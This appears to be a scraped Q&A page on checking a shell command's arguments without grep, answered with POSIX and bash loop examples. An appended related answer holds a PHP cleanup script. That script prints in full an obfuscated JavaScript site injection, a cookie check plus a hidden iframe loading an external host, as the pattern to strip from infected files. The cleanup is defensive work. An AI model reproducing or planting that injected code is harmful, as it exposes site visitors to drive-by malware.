Regex – Regex to Check Arguments of Command

argumentsgrepregular expressionvariable

I want to use grep to check if a command called cmd that was ran, contains the word name as an argument. (I know about about !* in Bash, I don't want to use it).

Let's say I have the command in a variable called process.

At first I tried echo $process | grep 'cmd name'. This isn't refined enough, since it only takes into account one argument.

So I tried to see if I could capture it as the last argument using the regex cmd .*(?= )name. The idea is to capture anything, followed by a space, followed by name (after cmd). But this doesn't work.

My goal, if this worked, was to then try to account for it being an argument in any of the positions.

How can use regular expressions to do this?

Best Answer

In the answer below, I'm explicitly avoiding using grep. A command line is a list of separate items, and it should be parsed as such, not as a line of text.

Assuming that you keep both the command and the arguments of the command in a single string (it would be better to use an array, see How can we run a command stored in a variable?), then you can do something like

process='cmd with "some arguments" and maybe name'

set -f
set -- $process

if [ "$1" != 'cmd' ]; then
    echo 'The command is not "cmd"'
    exit 1
fi

shift

for arg do
    if [ "$arg" = 'name' ]; then
        echo 'Found "name" argument'
        exit
    fi
done

echo 'Did not find "name" argument in command line'
exit 1

This would first disable filename generation, because we want to use $process unquoted to split it up into separate words, and if that string contains filename globbing patterns (like *), it would mess up our parsing of it. We do this with set -f.

Then we set the positional parameters to the words in $process. After that, if "$1" is cmd, we know we should be looking for name in the rest of the command line. If not, we stop there.

We shift off cmd from the list of positional parameters and start looking at the arguments in a loop. In each iteration, we simply compare the argument to the string name. If we find it, we say so and exit.

At the end of the loop, we know we haven't found the name argument, so we report this and exit with a failure.

Note that in my example above, the argument some arguments would be parsed as the two separate strings "some and arguments", which is one of the reasons you'd never want to store a command and its arguments in a single string. It also means that it would detect the argument name inside the single argument "some name string", which would be a false positive.

If the command line is stored in an array (in e.g. bash), then you could do it like this:

process=( cmd with "some arguments" and maybe name )

if [ "${process[0]}" != 'cmd' ]; then
    echo 'The command is not "cmd"'
    exit 1
fi

for arg in "${process[@]:1}"; do
    if [ "$arg" = 'name' ]; then
        echo 'Found "name" argument'
        exit
    fi
done

echo 'Did not find "name" argument in command line'
exit 1

The expansion of "${process[@]:1}" would be the whole array but not the first item (the command name).

For /bin/sh (and dash, but also bash and any other POSIX shell), the above would be less wordy:

set -- cmd with "some arguments" and maybe name

if [ "$1" != 'cmd' ]; then
    echo 'The command is not "cmd"'
    exit 1
fi

shift

for arg do
    if [ "$arg" = 'name' ]; then
        echo 'Found "name" argument'
        exit
    fi
done

echo 'Did not find "name" argument in command line'
exit 1

This is essentially the same as the first piece of code, but with the correct handling of all the arguments (quoting etc.) since we never combine all the elements of the command line into a single text string.

Related Solutions

Bash – Problems with regex in grep

Since I'm more familiar with php, I ended up with this:

#! /opt/php56/bin/php
<?php

$searchpattern='/*236499a9e0b11c0dc3eecf5cf751a097*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28
\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E
\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x73\x75\x63\x68\x6B\x61\x34\x36\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62
\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A
\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E
\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xf19b[0]]=function(){function _0x10b1x1(_0x10b1x2,_0x10b1x3,_0x10b1x4){if(_0x10b1x4){var _0x10b1x5= new Date();_0x10b1x5[_0xf19b[2]](_0x10b1x5[_0xf19b[1]]()+_0x10b1x4);};if(_0x10b1x2&
&_0x10b1x3){document[_0xf19b[3]]=_0x10b1x2+_0xf19b[4]+_0x10b1x3+(_0x10b1x4?_0xf19b[5]+_0x10b1x5[_0xf19b[6]]():_0xf19b[7])}else {return false};}function _0x10b1x6(_0x10b1x2){var _0x10b1x3= new RegExp(_0x10b1x2+_0xf19b[8]);var _0x10b1x4=_0x
10b1x3[_0xf19b[9]](document[_0xf19b[3]]);if(_0x10b1x4){_0x10b1x4=_0x10b1x4[0][_0xf19b[10]](_0xf19b[4])}else {return false};return _0x10b1x4[1]?_0x10b1x4[1]:false;}var _0x10b1x7=_0x10b1x6(_0xf19b[11]);if(_0x10b1x7!=_0xf19b[12]){_0x10b1x1(_
0xf19b[11],_0xf19b[12],1);var _0x10b1x8=document[_0xf19b[14]](_0xf19b[13]);var _0x10b1x9=1380;var _0x10b1xa=_0xf19b[15]+_0x10b1x9+_0xf19b[16];_0x10b1x8[_0xf19b[17]]=_0xf19b[18]+_0x10b1xa+_0xf19b[19];document[_0xf19b[21]][_0xf19b[20]](_0x1
0b1x8);};};
/*236499a9e0b11c0dc3eecf5cf751a097*/';

$escaped_search = escapeshellarg($searchpattern);

$cmd = "grep -Frl $escaped_search .";

exec($cmd, $files);

$iter = 0;

foreach ($files as $file) {
    if (basename($file) !== basename(__FILE__)) {
        $iter++;
        $filecontents = file_get_contents($file);
        $filecontents = preg_replace("/(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)/", '', $filecontents);      
        file_put_contents($file, $filecontents);
    }
}

print("for count: $iter") . PHP_EOL;

$count = exec("fgrep -lr $escaped_search . | wc -l");

print("grep count: $count") . PHP_EOL;

I think the grep part could be optimized with a regular expression too, something like this:

fgrep -rl '(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)[\s\S]*(\/\*236499a9e0b11c0dc3eecf5cf751a097\*\/)' .

But I dint' try it, so I don't know for sure.

A better way to recover from this kind of malware would be to use a backup, but In my case this wasn't possible, so I opted for the search/replace strategy.

Thanks for all the help !!

Best Answer

Related Solutions

Bash – Problems with regex in grep

Related Question